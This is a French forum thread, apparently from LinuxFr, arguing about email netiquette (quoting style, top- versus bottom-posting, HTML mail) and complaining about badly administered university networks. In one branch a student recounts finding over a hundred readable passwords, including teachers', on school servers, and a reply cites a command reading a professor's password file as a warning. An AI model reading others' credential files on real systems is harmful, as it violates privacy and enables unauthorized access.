                                J'ai aussi vu que beaucoup de foutus clients mail, et ca c'est un autre probleme, je sais pas ce qu'il font, mais ca brise le fil.
                                J'imagine que ca doit enlever l'ID ou la changer (comportement stupide il est vrai).


                                ce que tu veux dans les réponses à tes mails, c'est: une courte citation bien choisie qui te permet de te remémorer le sujet dont il s'agit

                                Comme justement le suivi par fil n'est pas possible, du fait que les mails envoyés ne sont pas affichés, en gardant la totalité des echanges dans un seul mail on reproduit un peu ce comportement de fil.

                                Pour une newsgroup, oui, là c parfait de faire comme tu dis, inutile de garder les vieux messages vu qu'on a l'histo sous les yeux, dans d'autres emails et vu que ton client sera configuré pour afficher par fil. Mais ca n'est malheureusement pas possible avec les mails, alors voila...
                                • [^] # Re: mais nan, c'est toi qui est tétu :o))

                                  Posté par  . Évalué à 2.

                                  Mais le mail d'origine, celui que j'envoi, il est dans "mail sent" , pas dans l'inbox...

                                  Si tu utilisais un bon client qui se laisse paramétrer aussi ou alors un moyen simple est de se rajouter en 'Bcc' ou 'Gcc'.
                        • [^] # Re: La netiquette c'est du confort !

                          Posté par  . Évalué à 2.

                          Tout ce qui a été dit par le clan des "on ecrit APRES" + La citation ci-dessus me fait penser à des gens qui ne veulent pas evoluer et qui aimeraient voir les autres utiliser leurs outils en fonction des dogmes de ce "clan".

                          Hmm ?? Le mail est un protocole d'échange. L'idée dans l'échange s'est d'être compris à l'autre bout du tuyau. En 'règlementant' la façon dont nous devrions échanger, permet de s'assurer suivre un certain standard que tout le monde sera en mesure de suivre.

                          Tu sais c'est un peu comme le W3C. Il y a des gens qui réflechissent pour ça. La netiquette n'est pas là pour faire ch*r qui que ce soit mais bien pour faciliter les échanges.

                          Pourquoi pas de mail en HTML? c beau l'html, ca fiat un email + soigné, c moderne, c normal.

                          Le fait qu'un message soir plus "soigné" ne rend pas son contenu plus interessant (entre autre). C'est un des arguments majeurs. L'autre est que cela surcharge un mail pour pas grand chose en fait.

                          Autre argument, quand tu ouvres ton cliant mail, que tu affiches l'email recu, que fait le programme? il va en bas tout seul ou il ouvre l'email du debut?
                          Il l'ouvre du debut, donc, hop de suite tu as la reponse sous les yeux.


                          Absolument sans rapport. Pour le reste disons que on correspondant n'est absolument pas obligé de te renvoyer le mail complet pour te répondre ça. Un quote de la question avec la réponse en dessous et voilà. VIsibilité accrue, pas de scroll. Bref ça renvoie bien au schéma: Question *puis* Réponse.
                          • [^] # Re: La netiquette c'est du confort !

                            Posté par  (site web personnel) . Évalué à 1.

                            À propose de l'HTML:

                            Le fait qu'un message soir plus "soigné" ne rend pas son contenu plus interessant (entre autre). C'est un des arguments majeurs. L'autre est que cela surcharge un mail pour pas grand chose en fait.

                            des fois ça aide bien d'avoir certains mots en couleur, ou surlignés. Il me semble qu'ils font la même chose dans les journaux: des mots en italiques pour les citations par exemple.

                            PS: quasiment tout le temp j'écris des courriers au format texte brut.
                            • [^] # Re: La netiquette c'est du confort !

                              Posté par  . Évalué à 1.

                              des fois ça aide bien d'avoir certains mots en couleur, ou surlignés. Il me semble qu'ils font la même chose dans les journaux: des mots en italiques pour les citations par exemple.

                              Et donc il y aurait besoin du HTML pour ça ??

                              Ton bon client qui se respecte (même mutt je suis sûr) permet moyennant un système basique de "balise" de donner un effet au texte.

                              Par exemple Gnus en est capable. Ca consiste a simplement entouré un mot/phrase d'un caractère particulier.

                              Ensuite charge au *client* de le décoder/afficher comme bon lui semble. Avec le HTML tu aurais à l'arrivée quelque chose qui ne te plairait pas forcément (que ton correspondant t'aurait imposer). Avec le système actuel libre à toi de voir: *bold* en gras ou de voir *bold* dans ton client. Libre à toi de paramétrer ton client pour qu'il t'afficher en bleu certains mots...

                              Bref je ne vois pas trop l'intérêt du HTML dans les échanges (mails et usenet).
                        • [^] # Re: La netiquette c'est du confort !

                          Posté par  . Évalué à 1.

                          Exemple, des fois je dois demander qu'on me donne un ordre, j'envois un email expliquant le probleme et je dis, voila, il faut faire ca opur le resoudre, donne moi l'ordre.
                          Le mec repond un "ok do it" Informel, c tout, on est là pour bosser par pour etre super polis entre nous (enfin, pour ce genre d'email on reste succint).
                          Quand je recois son mail, je vois le "OK do it" de suite, pas besoin de scroller jusqu'au bas de l'email: confort accru je trouve.


                          Le fait, quand on cite un message, d'en enlever une bonne partie si ça dépasse quelques lignes, c'est de la politesse. Ce qu'on appelle la Netiquette, c'est la politesse du Net ! Personne n'a encore mentionné cet aspect dans cette discussion.

                          Ca demande quelques secondes de plus de supprimer des lignes de la citation du message auquel on répond, mais c'est pour l'agrément du (des) receveur(s). La vie en commun implique de la politesse pour faciliter les choses, et la politesse c'est aussi une marque de respect de son interlocuteur. Pour moi, ceux qui citent comme des porcs à la Outlook sans jamais faire le nettoyage dans le message cité, sont des malpolis et des feignants. Personnellement je fais l'effort d'envoyer des messages agréables à lire. Je vais même jusqu'à nettoyer un message, quand il a été "forwardé" plusieurs fois et qu'il contient différents niveaux de ">" dans tous les sens, avant de le retransmettre.
                          • [^] # Re: La netiquette c'est du confort !

                            Posté par  . Évalué à 2.

                            Pierre tramo l'a deja souligné.

                            Mais ton post me donne à reflechir.
                            En effet,si tout le monde agissait comme ceci, cela pourrait peut etre marcher et etre clair et soigné.

                            Petite note: Est il poli de repondre apres quand quelqu'un te repond avant?
                            Petite note 2: meme si tu as raison, comment faire pour que mircosoft et lotus notes changent et se mettent à repondre apres? par defaut.
                            Petite note 3: Pour quellle raison MS et d'autres ont-ils choisi de repondre avant?

                            Enfin, comme j'ai dit plus bas, j'vais reflechir à tout ca et voir ce que j'en pense apres decantation.
                            • [^] # Re: La netiquette c'est du confort !

                              Posté par  . Évalué à 2.

                              Petite note 2: meme si tu as raison, comment faire pour que mircosoft et lotus notes changent et se mettent à repondre apres? par defaut.

                              Pour Outlook Express, voir oe-quotefix :
                              http://www.aminautes.org/forums/configurer/oe/QF_doc.html(...)

                              Pour Notes... Heu, y'a des gens qui utilisent ce truc, encore ? [:totoz]

                              Petite note 3: Pour quellle raison MS et d'autres ont-ils choisi de repondre avant?

                              Les raisons doivent être à peu près les mêmes que celles pour lesquelles ie ne supporte pas les png transparents et merde grave avec les css. Autrement dit : je n'en sais rien.
                            • [^] # Re: La netiquette c'est du confort !

                              Posté par  . Évalué à 1.

                              Petite note: Est il poli de repondre apres quand quelqu'un te repond avant?

                              La seule règle de politesse est d'appliquer la netiquette. Quand j'ai droit à ce genre de mail, perso je le reformate et je réponds en dessous.

                              Petite note 2: meme si tu as raison, comment faire pour que mircosoft et lotus notes changent et se mettent à repondre apres? par defaut.

                              Une seule possibilité, ne plus utiliser leurs produits. Quand ils verront que beaucoup d'utilisateurs se tournent vers d'autres solutions plus respectueuses des standards (en général), peut-être réflechiront-ils, peut-être aussi s'en foutront-ils.

                              Petite note 3: Pour quellle raison MS et d'autres ont-ils choisi de repondre avant?

                              Disons qu'ils ont un égo assez démesuré et que pour eux tout ce qu'ils font doit être un standard de facto. En gros ils imposent des trucs sans se soucier de ce qui se fait (ie des standards, règles d'usages,...). Avec leur base d'utilisateur ils ne craign(ai)ent pas grand chose. Heureusement de plus en plus de gens se rendent compte de ça et tentent de voir comment cela se passe ailleurs. Bien sûr il y a les indécrotables mais bon ceux là sont irrécupérables et prennent tout pour argent comptant donc...
                        • [^] # Re: La netiquette c'est du confort !

                          Posté par  . Évalué à 2.

                          Tu as raison.
                          De même, les journaux devrait imprimer en couleur avec des titres en wordart, et une police gothique, ca serait beaucoup plus joli. On perdrait un peu en lisibilité mais c'est pas très grave.
                          Pareil à la télé: le 20h est un peu terne, ils devraient mettre plus d'effets speciaux, avec des explosions dans tous les sens, parceque les gars des effets speciaux font des vachement belles explosions quand même (tu te rappelle d'independance day ? c'est mon film préféré)

                          Il parait qu'a la préhistoire, des gens ecrivait les mail en texte simple, et qu'ils mettaient le texte en valuer *comme ça*. C'est vraiment ridicule. Heuresement qu'on est au XXIème siècle, et qu'on des technologies plus modernes.

                          PS: et quelle idiotie de mettre la réponse apres la partie du mail à laquelle on répond !

                          --
                          Newbix, expert trolleur.
                          newbix@dlfp.fr
                          http://linxfr.org/~newbix(...)
                          Quote of the day:
                          La femme coquette est l'agrement des autres
                          et le mal de qui la possede. Voltaire


                          == Original message ==

                          Je l'avais lu oui, du coup j'ai relu ;)

                          Mais non, rien n'y fait.

                          Dans mes amis proches, non-informaticiens, j'ai un mal fou à leur faire bien utiliser leur messagerie (pas de HTML, pas de citation à la Outlook)

                          Tout ce qui a été dit par le clan des "on ecrit APRES" + La citation ci-dessus me fait penser à des gens qui ne veulent pas evoluer et qui aimeraient voir les autres utiliser leurs outils en fonction des dogmes de ce "clan".

                          Pourquoi pas de mail en HTML? c beau l'html, ca fiat un email + soigné, c moderne, c normal.
                          Pour moi un mail pourait tout aussi bien inclure du java, du javascript, et meme du flash, si le recepteur de cet emai est équipé pour le lire. Pourquoi pas apres tout? Pourquoi rester avec du texte brut alors qu'on a des technologies qui nous permettent de faire des choses 10000 fois plus belles. Mais ceci est un autre sujet.

                          Je trouve horripilant les messages à la Outlook, où après plusieurs aller/retours on se retrouve avec des messages de plus en plus longs, contenant l'intégralité de la conversation.
                          Sur une mailing-list de ma boîte, pourtant consacrée à Linux, ya des boulets qui citent les 100 lignes d'un message (à la Outlook) et qui se contentent de répondre au-dessus "Je suis d'accord, bonne idée". Quand en plus les messages sont en HTML (+ texte), on finit par des messages de 20 Ko pour 2-3 lignes utiles.

                          Coucou, c'est moi le boulet :)

                          Quand tu reponds au dessus et non en dessous ce genre d'email n'est pas genant...

                          Autre argument, quand tu ouvres ton cliant mail, que tu affiches l'email recu, que fait le programme? il va en bas tout seul ou il ouvre l'email du debut?
                          Il l'ouvre du debut, donc, hop de suite tu as la reponse sous les yeux.
                          Exemple, des fois je dois demander qu'on me donne un ordre, j'envois un email expliquant le probleme et je dis, voila, il faut faire ca opur le resoudre, donne moi l'ordre.
                          Le mec repond un "ok do it"
                          Informel, c tout, on est là pour bosser par pour etre super polis entre nous (enfin, pour ce genre d'email on reste succint).
                          Quand je recois son mail, je vois le "OK do it" de suite, pas besoin de scroller jusqu'au bas de l'email: confort accru je trouve.


                          Cette discussion a deja été faite sur DLFP des milliers de fois mais ca fait pas de mal de la refaire :)
                • [^] # Re: Les handicapés du Web...

                  Posté par  . Évalué à 1.

                  C'est un peu fini le temps des 14.4 et des BBS.

                  Oui, ben c'est raté, parce que si cet argument n'a plus beaucoup court actuellement (on ferait mieux d'éradiquer le spam pour alléger les serveurs de mails et la BP, par exemple), reste celui de la communication.

                  Quand on répond, en général, c'est point par point. D'où l'idée de ne garder que c sur quoi l'on souhaite argumenter et répondre en dessous (parce qu'au dernières nouvelles, c'est de haut en bas que l'on lit en France). Quitte à le répéter plusieurs fois pour chaque point.

                  Á la limite, par mail, c'est un moindre mal, puisque le nombre d'interlocuteurs est relativement réduit (sauf si certains ont l'habitude de gonfler la liste des destinataires en cours de route). Mais c'est extrêmement régulier également sur Usenet et dans les mailing-listes. Et là, c'est vraiment la plaie, parce que personnellement, j'ai pas besoin de me récupérer la totalité des 10 messages que mon niouzerideur me présente gentiment dans le fil.

                  Je parle même pas des petits outils qui permettent de virer tout ce qui se passe après la signature (avec raison), ce qui me donnent, avec les goret-quotteurs, un bête message tout seul sans que l'on sache exactement à qui et à quoi répond l'intervenant.
                  • [^] # Re: Les handicapés du Web...

                    Posté par  . Évalué à 1.

                    Pour usenet ou autre, oui, je suis tout à fait d'accord et c'est meme, a mes yeux, une evidence.
                    Pour le mail, tu connais mon avis.

                    Quand on repond à un mail, ce n'est pas forcement point par point, des fois tu reponds generalement, a la limite tu pourais effacer tout l'email et repondre sans rien garder, mais la personne qui recevra le mail ne saura peut etre plus de quoi on parle et donc, de garder l'historique de la discu est pratique.
                    • [^] # Re: Les handicapés du Web...

                      Posté par  . Évalué à 1.

                      des fois tu reponds generalement, a la limite tu pourais effacer tout l'email et repondre sans rien garder, mais la personne qui recevra le mail ne saura peut etre plus de quoi on parle et donc, de garder l'historique de la discu est pratique.

                      Tout à fait, c'est pour cela que dans ce cas là, je vire la citation, j'ajoute une balise [Á propos de pétaouchnok] et je fais ma remarque générale. Mais la balise, elle est au-dessus.
                      • [^] # Re: Les handicapés du Web...

                        Posté par  . Évalué à -1.

                        OK, prenons un cas particulier, un exemple, et travaillons dessus.

                        Mail d'origine, venant de moi:

                        Salut Aristide,

                        xxxxx a besoin de toucher yyyyy, voila le routage actuel:

                        yyyyyyy est sur blabla1, blabla2 et blabla3 en rero

                        J'ai fait des tests et ca marche aussi par blabla4 et blabla5.
                        Esct ce que je peux router xxxxx sur yyyyyy?

                        Merci

                        Moi


                        1) Reponse, a ta maniere:
                        [A propos de xxxxx sur yyyyy]
                        Oui, vas-y.

                        Aristide.

                        Deja il a du faire un effort, effacer tout le texte, quoter, c sympa et poli mais je trouve que c beaucoup demander.
                        De plus il va falloir que j'aille rechoper mon mail d'origine pour me souvenir ce que je voulais faire exactement.

                        2) Reponse, a ma maniere:
                        oui, vas-y

                        Aristide

                        ------Original message---------

                        [...] (je coupe...)


                        Ca lui a pris 2 secondes a repondre, moi de suite je vois sa reponse, j'ai plus qu'a lire ce que je lui avais envoyé comme email pour me souvenir quoi faire, je le fais et je repond a son email un:

                        OK, c'est fait

                        Simple, efficace.
                        • [^] # Re: Les handicapés du Web...

                          Posté par  . Évalué à 1.

                          Deja il a du faire un effort, effacer tout le texte, quoter, c sympa et poli mais je trouve que c beaucoup demander.

                          Hé, oh, on oublie quelque chose, là, c'est que l'on communique. J'ai jamais dit que la communication était simple et facile, mais un minimum de manipulation de part et d'autres évite beaucoup de travail à tout le monde en général.

                          Ca lui a pris 2 secondes a repondre, moi de suite je vois sa reponse, j'ai plus qu'a lire ce que je lui avais envoyé comme email pour me souvenir quoi faire, je le fais et je repond a son email

                          Tiens, ton argument me fait penser que la majorité des clients (outlook express compris), gère un champ Reference qui permet justement de dessiner un fil avec les mails précédents, sous réserve évidemment que tu ne les bennes pas à la poubelle. Du coup, ton argument ne tient plus.
                          • [^] # Re: Les handicapés du Web...

                            Posté par  . Évalué à 1.

                            J'ai jamais dit que la communication était simple et facile, mais un minimum de manipulation de part et d'autres évite beaucoup de travail à tout le monde en général.

                            Oui, mais si on arrive au meme resultat avec moins d'effort, c'est mieux.

                            Perso par defaut je repond au dessus, comme tu le sais.
                            Si quelqu'un me repond au dessous, alors je m'adapte et repond aussi en dessous, c'est la moindre des politesses je trouve.

                            Repondre en dessous, quoter, garder uniquement ce qui interesse est une bonne chose opur certains emails, dans d'autres cas c mieux au dessus amha.
                            de toute facon, au dessus ou au dessous: aucune des deux solutions n'est parfaite je trouve. Rien ne sera jamais aussi clair que ce qu'on peut voir dans un forum.
                            L'ideal, pour moi, serait d'arriver a reproduire le comportement d'un forum, par email.
                            Et là oui, merveille des merveilles, on repondrait en dessous et on quoterait si besoin est.

                            Bon, vais me louer un film je crois moi ce soir.
                            • [^] # Re: Les handicapés du Web...

                              Posté par  . Évalué à 1.

                              L'ideal, pour moi, serait d'arriver a reproduire le comportement d'un forum, par email.

                              Je te conseille de relire le dernier paragraphe de mon message précédent.
                              • [^] # Re: Les handicapés du Web...

                                Posté par  . Évalué à 0.

                                Oui oui, j'ai bien lu.
                                Mais m'as tu lu?

                                "Ca marche pas" cette fonction. Pour deux raisons.
                                La premiere, et la seule valable, c'est que quand tu envois un mail, ca n'est pas dans l'inbox et donc ca ne s'affichera pas dans le fil.
                                La deuxieme c'est que certains clients emails, que je ne me suis pas encore amusé à reperer, enlevent le mail ID ou je sais , mais en tout cas mon client mail ne les reconnait pas comme faisant parti du meme fil. Cette deuxieme est, il est vrai, non recevable, le client mail doit etre corrigé pour respecte ceci.

                                Bon, je vais arreter ici la discussion, ca me coute trop cher en XP cette histoire et ca commence à me mettre de mauvaise humeur d'avoir perdu 7 XPs (oui oui, 7) aujourd'hui, dont 5 ou 6 à cause de cette discussion. Et j'aime pas etre de mauvaise humeur :)

                                J'vais aller réflechir à tous nos arguments, laisser decanter tout ça, et peut-etre demain j'aurais un autre avis... On peut rever ;)
                                • [^] # Re: Les handicapés du Web...

                                  Posté par  . Évalué à 2.

                                  "Ca marche pas" cette fonction. Pour deux raisons.
                                  La premiere, et la seule valable, c'est que quand tu envois un mail, ca n'est pas dans l'inbox et donc ca ne s'affichera pas dans le fil.


                                  Heuuuuuuu... Tu pourrais développer ? J'ai pas du tout compris.

                                  Edit : pinaise, j'ai compris. Tu veux dire qu'une fois envoyer, le mail n'apparait pas dans la même boite que celui auquel tu réponds, mais ailleurs (chez moi, c'est outbox) ? Bon, ben je m'organise dans ces cas là : si je sais que je veux garder l'enfilade, je récupère mes envois pour les mettre bien au chaud avec le reste de la discussion.

                                  La deuxieme c'est que certains clients emails, que je ne me suis pas encore amusé à reperer, enlevent le mail ID ou je sais , mais en tout cas mon client mail ne les reconnait pas comme faisant parti du meme fil. Cette deuxieme est, il est vrai, non recevable, le client mail doit etre corrigé pour respecte ceci.

                                  Expérience perso : le Reference est géré au moins par Outlook Express, Mozilla mail et mutt. Par contre, je ne sais pas si Outlook Express est capable d'affichage en enfilade.

                                  Bon, je vais arreter ici la discussion, ca me coute trop cher en XP cette histoire et ca commence à me mettre de mauvaise humeur d'avoir perdu 7 XPs (oui oui, 7) aujourd'hui, dont 5 ou 6 à cause de cette discussion. Et j'aime pas etre de mauvaise humeur :)


                                  Moi j'en gagne.
                                  Ce qui prouve que j'ai raison.
                                  • [^] # Re: Les handicapés du Web...

                                    Posté par  . Évalué à 1.

                                    Bon, je la refait avec des balises pas bouffées par le slip à templite :
                                    <troll>Ce qui prouve que j'ai raison. </troll>
              • [^] # Re: Les handicapés du Web...

                Posté par  . Évalué à 5.

                Rhaa c'est mon lot quotidien où on cirtique Gnus parce que soit-disant pas "user friendly" comprendre "moche" (oui moche pas autre chose)

                Ah non, ça je confirme, Emacs / GNUS sentent méchamment des pieds. Mieux vaut utiliser des outils simples, bien pensés, et ergonomiques, soit vim / mutt / slrn ( ce qui nous dote pour le même prix d'un éditeur de texte).
            • [^] # Re: Les handicapés du Web...

              Posté par  . Évalué à 1.

              Je trouve horripilant les messages à la Outlook

              Je te souhaite alors de ne jamais croiser un message à la Lotus Notes alors,
              il pourrait y avoir des morts... si y en a qui l'utilisent j'aimerais bien savoir
              quelque chose : les énormes boites en ascii art, c'est un choix de l'utilisateur
              qu'il trouve dans les préférences, ou c'est fixé et y a pas moyen de l'éviter?
              • [^] # Re: Les handicapés du Web...

                Posté par  . Évalué à 2.

                Les boîtes en ascii-art, ça doit être possible de les enlever. Par contre, à l'époque où je l'utilisait à mon boulot il y a environ 2 ans, il était strictement impossible de faire un message correct. Pour moi qui était habitué à mutt+vim, ce fut vraiment le choc de cultures.
                C'est vraiment une honte ce logiciel.
          • [^] # Re: Les handicapés du Web...

            Posté par  (Mastodon) . Évalué à 1.

            -- Oui, pas toi ?
            -- Et donc tu lis les réponses avant les questions, même en lisant de haut en bas ?
    • [^] # Re: Les handicapés du Web...

      Posté par  (site web personnel) . Évalué à 2.

      Pas d'accord du tout, désolé.
      Même à l'époque de Netscape 2, celui avec le gros N qui clignotait, et de l'omniprésence de Usenet, à l'époque où il y a avait encore un écureuil Goofer sur les bureaux, à cette époque, donc, je trouvais que la réponse en-dessous n'était pas toujours la meilleure solution, et entrainait, au bout d'un moment, une incompréhension presque totale du message. Par exemple, quand on est plusieurs et que certains ont effacé des parties du message, et dans plein d'autres cas.
      La netiquette, il faut savoir en sortir, et être un peu plus souple. C'est pas un dogme. Si tu veux une religion, y a des églises, pour ça.
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 1.

      Merde je viens de voir que ça concernait la signature mais je pensais au texte cité.

      Donc oui, la signature va à la fin, je suis d'accord avec vous. Mais pour ce qui est du texte original, j'ai pas forcément besoin de le citer ni de faire une réponse point par point.

      Vous ne pouvez pas admettre que qu'on puisse répondre à quelqu'un en écrivant son texte puis le message original (Machin wrote) puis enfin sa signature ?
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 4.

    C'est la fête aujourd'hui, entre les arriérés du HTML et d'autres teigneux sur diverses listes...

    Y'a quelque chose de pourri au royaume de l'informatique grand public :/
  • # Re: Les handicapés du Web...

    Posté par  (site web personnel) . Évalué à 4.

    Tu nest pas le seul ploum.
    Moi a mon IUP tous les repertoire des serveurs sont accessible en lecture.
    Et apres un test pour voir au bout combien de temps on pouvais recupéré mon pass je me suis apercu que lon trouver plus dune centaine des pass avant le miens (jété rassuré mais quand je me suis apercu quil y avait une dizaine de pass de prof, de prof d'informatique surtous, jai été tres decus.)
    Un prof d'informatique qui parle de tant en tant de sécurité et qui met le nom de sa copine en pass ca fait pas serieux.
    A par les serveurs sous HP UX tous est sous winXP (une référence en matiere de sécurité). De plus dapres mon prof d'Admin reseau (cest pas lui qui administre le reseau) le swap de ces machines passe par le reseaux et que cest pour ca que ca rame.
    Et le pompom cest la salle de machine pour faire les tp de reseau qui sont sous linux (ahhhhh! enfin) mais mal configuré et surtous on y bosse dessus en root alors quelle sont sur le reste du reseau.... (apt-get install nmap telnet xmule etc...
    Pour acheter des serveurs ils sont fort mais pour les mettrent niquel ya plus perssonne.

    Pour résumé je citerais ma tante chercheuse au CNRS: les bons informaticiens sont mieux payé ailleurs alors ils se barrent et ils restent que les autres.
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 1.

      Bah je sais pas, mais pour moi un TP réseau sans être root, je vois pas ce que tu tpéïser. Genre mettre en place du routage, ipv6, firewall, ipv6, ... On a fait ce genre de choses, si t'es pas root tu fais comment ?!
      • [^] # Re: Les handicapés du Web...

        Posté par  . Évalué à 2.

        sudo ?
      • [^] # Re: Les handicapés du Web...

        Posté par  (site web personnel) . Évalué à 1.

        Cest vrai que jai pas précisé les tps que l'on fait :) .
        ben juste pour faire du rtp ya pas besoin detre root.
        Et les autres tp rezo ils se font sur des vrai routeurs et les pc servent qua faire un ping (et encore les profs font faire ca sous windows).
        Mais ta remarque est bonne, encore faut il que l'on ai des tps la dessus (mais yen a pas bouuuuuuh, pourtants jaurais aimé en faire).
        Et cest comme ca que l'on se retrouve avec des mecs ayant une maitrises info et ne sachant ni faire du C ni ce que c'est une connection tcp.
      • [^] # Re: Les handicapés du Web...

        Posté par  (site web personnel) . Évalué à 1.

        Tu utilises un vserver (profite en pendant que c'est encore en premiere page :), une "cage" chroot, nimporte quoi...
      • [^] # Re: Les handicapés du Web...

        Posté par  (site web personnel) . Évalué à 1.

        Tu mets les étudiants en root mais tu connectes pas les machines sur le meme réseau que le reste de l'université ...
        • [^] # Re: Les handicapés du Web...

          Posté par  (site web personnel) . Évalué à 1.

          Cest ce qui serait intelligent mais cest pas fait.
          d'autant plus que sans net dl des packages seraient plus dur:)

          mais bon faut mettre a leur credit que vu quils ont mal configuré ces pc il est plus difficile de faire des conneries avec (difficile aussi de faire les tps avec aussi malheuresement).
          Passer 4h de tp a réparé des machines au lieu de faire les TPs cest moyen.
      • [^] # Re: Les handicapés du Web...

        Posté par  . Évalué à 1.

        Nous pour les TP de reseau on est root mais c'est une install speciale qu'ils enlevent apres les TP...
        L'admin a des ghost de tout ca...
        Le reseau de l'iut est pas trop mal gere mais je pense pas qu'il soit tres secure... (Deja la salle serveur est ouverte en permanence...)

        A+
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 3.

      en tous cas visiblement t'as pas de cours de francais dans ton IUP
    • [^] # Re: Les handicapés du Web...

      Posté par  (site web personnel) . Évalué à 2.

      Fait gaffe quand meme qu'il te chope pas ton prof a aller lire les mots de passe des autres. Meme si il y avait un fichier Password.txt dans sont home dir en 777, le fait de faire un cat /home/prof/Password.txt, c'est le renvoie direct de ton IUP. Je prefere de prévenir ;)
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 2.

    paix à ton âme.

    Pour info, c quoi comme FAC ?
    Ya pas moyen que tu te revoltes ? Les personnes qui s'occupent du reseaux sont en général passionné d'informatique et pourront alors comprendre ton point de vu.
    Par exemple dans mon lycée, je sais que certains profs sont pour l'usage de linux.
    Je me souviens d'ailleur d'un conseil d'administration ou une prof a demandé ou ca en etait pour linux et la reponse qui lui a été faite c'est qu'il n'y avait pas de techniciens spécialisé linux pour venir reparrer les pannes si besoin.

    Une FAC c tout de meme fortement ataché à l'education et je pense alors que les logiciels utilisés doivent pouvoir etre utilisé par tous !
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 4.

      Les personnes qui s'occupent du reseaux sont en général passionné d'informatique.

      Mouhahahahaha ! *kof* *kof* huuuuuu....
      Ouais, il y a 15 ans, c'était le cas, les gens qui s'y investissaient étaient des passionnés. Maintenant...
    • [^] # Re: Les handicapés du Web...

      Posté par  (site web personnel, Mastodon) . Évalué à 3.

      Pour info, nous avons un newsgroup interne, j'y ai proposé justement que le LUG puisse donner un coup de main.

      J'ai reçu, du responsable système, des menaces disant que même les professeurs avaient lu mon message et n'étaient pas content. Et que contrairement à ce que je disais, il n'y avais PAS de failles de sécurité sur le système. (les mots de passes accessibles sont sans doute une feature !)

      Le plus drole, c'est que j'ai surpris des discussions des profs d'informatique qui veulent tout passer à Linux et qui se plaignent de ne pouvoir rien faire à cause de l'incompétence de certains...

      Mes livres CC By-SA : https://ploum.net/livres.html

      • [^] # Re: Les handicapés du Web...

        Posté par  (site web personnel) . Évalué à 1.

        L'incompétent essait de garder son beafteak. Renvoit un message (avec le précédent message) en cc les profs qui sont censé ne pas être content de la démarche. Ils vont adorer...

        "La première sécurité est la liberté"

    • [^] # Re: Les handicapés du Web...

      Posté par  (site web personnel) . Évalué à 4.

      " c'est qu'il n'y avait pas de techniciens spécialisé linux pour venir reparrer les pannes si besoin."

      GROSSE ANERIE!

      Si tu vois ton prof, dit lui que dans chaque département, il y'a un RAIP ou CRID rataché au rectorat et plein de techniciens qui interviennent sur les lycées et colleges. C'est technicien se doivent de connaitre Linux, ils ont clairement pas le choix vu que les préconnisation du ministere c'est Linux!
      Si ton profs veut du linux, il demande à l'intendant de faire une demande d'intervention aupres du raip de ton département pour faire un déploiement de linux sur les pc. Si les techniciens du raip répondent qu'ils ne connaissent pas linux, c'est tant pis pour eux, ils se forment et ils viennent, ils sont la pour offir un service, ils ont pas le choix. Quand on me demande de déployer iaca sur des postes Xp, je repond pas : "allez vous faire foutre, je connais pas!"
      • [^] # Re: Les handicapés du Web...

        Posté par  (site web personnel) . Évalué à 1.

        s/C'est/Ces

        Je fais généralement beaucoup de fautes mais la quand meme :)
      • [^] # Re: Les handicapés du Web...

        Posté par  . Évalué à 1.

        «il y'a un RAIP ou CRID rataché au rectorat et plein de techniciens qui interviennent sur les lycées et colleges»

        Pour les RAIP(E) je ne sais pas.
        Mais pour les GRID !!! Je suis membre d'un GRID et je peux te garantir qu'au sein de celui-ci personne n'a les compétences dont tu parles. Et je ne vois pas comment il serait possible qu'on les ait ! Nous sommes tous profs et notre participation au GRID se fait en plus de notre horaire normal.
        • [^] # Re: Les handicapés du Web...

          Posté par  (site web personnel) . Évalué à 1.

          Non, j'ai dit CRID et c'est la meme chose qu'un RAIP. Ca dépend juste des region.
          • [^] # Re: Les handicapés du Web...

            Posté par  . Évalué à 1.

            ah ? Je n'ai jamais entendu parler d'un CRID auparavant. Et je ne parviens pas à y trouver la moindre référence sur Google (enfin, à un "CRID" chargé des TIC dans l'EN... Voilà une phrase avec beaucoup d'initiales !).
            Peux-tu m'en dire plus à ce sujet ?
          • [^] # Re: Les handicapés du Web...

            Posté par  . Évalué à 1.

            Si c'est la même chose que les CRIA c'est quasi que des contractuels dedans...

            Alors pour les compétences ça dépend sur qui tu tombes...
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 7.

    Alors moi à la fac en Angleterre (brookes.ac.uk) , la meilleure solution pour garder des Windows 98/XP stables :
    A chaque fois que l'on se déloggue le HD est formaté et Windows repompé par le réseau...
    Génial la solution ! logiciel libre installé Mozilla 1.0...

    Alors cela nous ammène à un multiboot avec choix :
    Windows 98
    Windows XP
    Windows XP with visual studio .NET (VERY SLOW)

    vous imaginez la non-productivité ? ... Et le pire dans tout ca : c'est le nombre d'écran bleus...

    Ensuite on en vient à LA salle GNU/Linux qui était avant une salle SUN.
    Distribution : Suse , rien de configurer, les emails au root >/dev/null.

    Moi j'en arrive à un point au je me dit qu'il y a une incompréhension générale. Apres quand je vois les profs se ballader avec des pulls Microsoft Research et expliquer comment le buffet était bon à la dernière conference là je comprends mieux...
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 2.

      Alors moi à la fac en Angleterre (brookes.ac.uk) , la meilleure solution pour garder des Windows 98/XP stables :
      A chaque fois que l'on se déloggue le HD est formaté et Windows repompé par le réseau...
      Génial la solution !


      Euh, c'est pas forcément idiot, ça se fait pas mal dans certains endroits où t'as plein de postes clients avec la même config. Tous les matins, boot sur le réseau et récupération de l'image courante de l'OS sur le(s) serveur(s) maître(s), le /home est soit stocké localement soit exporté aussi. ça se fait presque tout seul avec Linux ou un BSD.

      Pour le reste, faut effectivement pas s'étonner que les profs soient cajolés par microsoft, ce sont eux qui forment leur prochaine génération de clients.J'imagine que ça devait être pareil avec IBM il y a 30 ans...
      • [^] # Re: Les handicapés du Web...

        Posté par  . Évalué à 2.

        > Pour le reste, faut effectivement pas s'étonner que les profs soient
        > cajolés par microsoft, ce sont eux qui forment leur prochaine
        > génération de clients.J'imagine que ça devait être pareil avec IBM il y
        > a 30 ans...


        Y a un problème de déontologie, quand t'es prof ton métier c'est pas de profiter des buffets dans les conf, c'est aussi d'enseigner et de former des gens.
        • [^] # Re: Les handicapés du Web...

          Posté par  . Évalué à 1.

          Comme c'est touchant.... c'est dans quel pays ?
        • [^] # Re: Les handicapés du Web...

          Posté par  . Évalué à 4.

